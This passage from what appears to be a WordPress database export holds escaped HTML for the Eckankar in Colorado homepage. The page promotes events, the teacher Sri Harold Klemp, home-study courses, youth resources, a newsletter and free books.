0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: Raleway; font-weight: 500; color: #697085; text-align: center; font-size: 35px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-services-10 boldgrid-section dynamic-gridblock bg-background-color color1-background-color color-1-text-contrast\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-4 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"mod-reset\"><img class=\"aligncenter size-full wp-image-269403\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/11/meetup-img-1-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-6 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"aligncenter size-full wp-image-269404\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/11/newsletter-img-2-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-4 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"aligncenter size-full wp-image-269405\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/11/freebooks-img-5-11-3-2023.jpg\" alt=\"\" width=\"360\" height=\"180\"></p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-top: 3px; padding-bottom: 15px;\">\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\" style=\"box-shadow: #cecece 0px 0px 0px 0px; border-bottom-right-radius: 0px;\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; border-bottom-left-radius: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; text-align: center; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Spiritual Connections</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">The purpose of this Meetup group is to provide a common meeting ground for all who have had, or would like to have, a life-changing spiritual experience.</p>\r\n<p>&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #f5f2eb; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-family: \'Raleway\'; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Get Your Monthly Newsletter!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 18px; font-weight: 600; font-family: \'Open Sans\';\" data-font-weight=\"600\" data-font-family=\"Open Sans\" data-font-style=\"\">Delivered right to your email inbox!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-bottom: 26px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Keep up with all the latest news and events from around the state.</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"\" style=\"font-weight: 400; font-family: \'Open Sans\'; font-size: 16px;\" href=\"https://eckankar-colorado.org/resa-faq/newsletter-subscription-members/\" data-font-weight=\"400\" data-font-family=\"Open Sans\" data-font-style=\"\">(Sunscribe to Initiates Newsletter Here)</a></p>\r\n<p class=\"\" style=\"text-align: center;\"><em>&nbsp;</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\"> Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; box-shadow: #cecece 0px 0px 0px 0px inset;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-family: \'Raleway\'; font-weight: 600; font-size: 23px; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">ECK Books Just For You</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-top: 6px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Find out how past lives, dreams, and<br>\r\nSoul Travel help you find God</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">This free-book offer includes two titles:<br>\r\n<strong><em>ECKANKAR—Ancient Wisdom for Today</em></strong> and <strong><em>Is Life a Random Walk?</em></strong></p>\r\n<p class=\"mod-reset\" style=\"text-align: center;\">&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color-1-text-contrast bg-background-color tmpl-media-7 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 67px; padding-bottom: 63px; box-shadow: rgba(0, 0, 0, 0.15) 0px 2px 8px; margin-bottom: 25px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-5\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-right: 0em;\">\r\n<p>[embed] https://www.youtube.com/watch?v=s78XVcM7HWI[/embed]</p>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 col-lg-7\">\r\n<h2 class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: -12px; color: #cd8a0e; font-size: 19px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Featured eck Video</h2>\r\n<p class=\"\" style=\"font-size: 29px; font-family: \'Open Sans\'; font-weight: 600; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">DO YOU LONG TO KNOW LIFE\'S PURPOSE?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">If you are ready for your next spiritual step, Eckankar’s Advanced Spiritual Living Courses offer a roadmap for your journey home to the heights of Self-Discovery and God-Discovery.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You don’t need to change your lifestyle to live a rich spiritual life. Enlightenment comes in a natural way from the inside out.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Ready to get your keys to spiritual transformation?</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(236838,40263,'post_new_post_content','<div>\r\n<p class=\"mod-reset\"><img class=\"aligncenter size-full wp-image-269192\" style=\"margin-top: -101px; position: absolute; z-index: 1;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/10/wave-white-2-h-200.png\" alt=\"\" width=\"1920\" height=\"165\"></p>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -245px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px;\" data-font-weight=\"600\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 33px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: \'Raleway\'; font-weight: 600; color: #697085; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n<div class=\"row\" 